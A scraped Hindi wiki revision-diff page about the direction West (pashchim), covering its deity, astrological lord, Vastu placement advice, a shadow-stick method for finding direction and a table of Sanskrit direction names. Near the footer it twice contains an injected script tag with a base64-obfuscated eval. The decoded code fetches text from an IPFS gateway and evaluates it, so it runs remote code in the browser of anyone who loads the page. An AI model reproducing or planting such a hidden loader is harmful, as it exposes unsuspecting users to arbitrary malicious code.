Difference between revisions of "पश्चिम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('thumb|250px|दिशाओं के नाम '''पश्चिम''' (अंग्रेज...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
[[चित्र:Compass-02.jpg|thumb|250px|दिशाओं के नाम]]
+
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=Compass-02.jpg
 +
|चित्र का नाम=दिशाओं के नाम
 +
|विवरण='''पश्चिम''' एक [[दिशा]] है। ज्योतिष के अनुसार [[शनिदेव]] पश्चिम दिशा के स्वामी हैं। यह दिशा प्रसिद्धि, भाग्य और ख्याति का प्रतीक है।
 +
|शीर्षक 1=दिशा ज्ञात करने का तरीक़ा
 +
|पाठ 1=एक छड़ी लें। उसे सीधा जमीन में गाड़ दें। जहाँ उसकी छाया की नोंक पड़े, वहाँ पर निशान लगा दें। 15 मिनट बाद छाया की नोंक पर दोबारा निशान लगा लें। दोनों निशानों के बीच में रेखा खींच कर उन्हें जोड़ दे। यह रेखा पूर्व से पश्चिम की ओर दिशा ज्ञान कराती है और पहला निशान पश्चिम की ओर और दूसरा निशान पूर्व की ओर होगा।
 +
|शीर्षक 2=देवता
 +
|पाठ 2=[[वरुण देवता|वरुण]]
 +
|शीर्षक 3=वास्तु महत्व
 +
|पाठ 3=पश्चिम दिशा [[सौर ऊर्जा]] की विपरित दिशा है अतः इसे अधिक से अधिक बन्द रखना चाहिए। भोजन कक्ष, दुछत्ती, शौचालय आदि इसी दिशा में होने चाहिए।
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी=प्राचीनकाल में दिशा निर्धारण प्रातःकाल व मध्याह्न के पश्चात एक बिन्दु पर एक छड़ी लगाकर सूर्य रश्मियों द्वारा पड़ रही छड़ी की परछाई तथा [[उत्तरायण]] व [[दक्षिणायन]] काल की गणना के आधार पर किया जाता था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
'''पश्चिम''' ([[अंग्रेज़ी]]:''West'') एक [[दिशा]] है। [[वरुण देवता|वरुण]] पश्चिम दिशा के देवता है और ज्योतिष के अनुसार [[शनिदेव]] पश्चिम दिशा के स्वामी हैं। यह दिशा प्रसिद्धि, भाग्य और ख्याति का प्रतीक है।
 
'''पश्चिम''' ([[अंग्रेज़ी]]:''West'') एक [[दिशा]] है। [[वरुण देवता|वरुण]] पश्चिम दिशा के देवता है और ज्योतिष के अनुसार [[शनिदेव]] पश्चिम दिशा के स्वामी हैं। यह दिशा प्रसिद्धि, भाग्य और ख्याति का प्रतीक है।
==महत्व==
+
==वास्तु महत्व==
पश्चिम दिशा [[सौर ऊर्जा]] की विपरित दिशा है अतः इसे अधिक से अधिक बन्द रखना चाहिए। ओवर हेड टेंक इसी दिशा में बनाना चाहिए। भोजन कक्ष, दुछत्ती, टाइलेट आदि इसी दिशा में होने चाहिए। इस दिशा में भवन और भूमि तुलनात्मक रूप से ऊंची होनी चाहिए।
+
पश्चिम दिशा [[सौर ऊर्जा]] की विपरित दिशा है अतः इसे अधिक से अधिक बन्द रखना चाहिए। ओवर हेड टेंक इसी दिशा में बनाना चाहिए। भोजन कक्ष, दुछत्ती, शौचालय आदि इसी दिशा में होने चाहिए। इस दिशा में भवन और भूमि तुलनात्मक रूप से ऊंची होनी चाहिए।
  
 
==दिशाओं के नाम==
 
==दिशाओं के नाम==

Revision as of 14:02, 20 January 2018

pashchim
vivaran pashchim ek disha hai. jyotish ke anusar shanidev pashchim disha ke svami haian. yah disha prasiddhi, bhagy aur khyati ka pratik hai.
disha jnat karane ka tariqa ek chh di lean. use sidha jamin mean ga d dean. jahaan usaki chhaya ki noank p de, vahaan par nishan laga dean. 15 minat bad chhaya ki noank par dobara nishan laga lean. donoan nishanoan ke bich mean rekha khianch kar unhean jo d de. yah rekha poorv se pashchim ki or disha jnan karati hai aur pahala nishan pashchim ki or aur doosara nishan poorv ki or hoga.
devata varun
vastu mahatv pashchim disha saur oorja ki viparit disha hai atah ise adhik se adhik band rakhana chahie. bhojan kaksh, duchhatti, shauchalay adi isi disha mean hone chahie.
any janakari prachinakal mean disha nirdharan pratahkal v madhyahn ke pashchat ek bindu par ek chh di lagakar soory rashmiyoan dvara p d rahi chh di ki parachhaee tatha uttarayan v dakshinayan kal ki ganana ke adhar par kiya jata tha.

pashchim (aangrezi:West) ek disha hai. varun pashchim disha ke devata hai aur jyotish ke anusar shanidev pashchim disha ke svami haian. yah disha prasiddhi, bhagy aur khyati ka pratik hai.

vastu mahatv

pashchim disha saur oorja ki viparit disha hai atah ise adhik se adhik band rakhana chahie. ovar hed teank isi disha mean banana chahie. bhojan kaksh, duchhatti, shauchalay adi isi disha mean hone chahie. is disha mean bhavan aur bhoomi tulanatmak roop se ooanchi honi chahie.

dishaoan ke nam

aangrezi sanskrit (hindi)
East poorab, prachi, prakh
West pashchim, pratichi, apara
North uttar, udichi
South dakshin, avachi
North-East eeshany
South-East agney
North-West vayavy
South-West nairrity
Zenith oordhv
Nadir adho


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>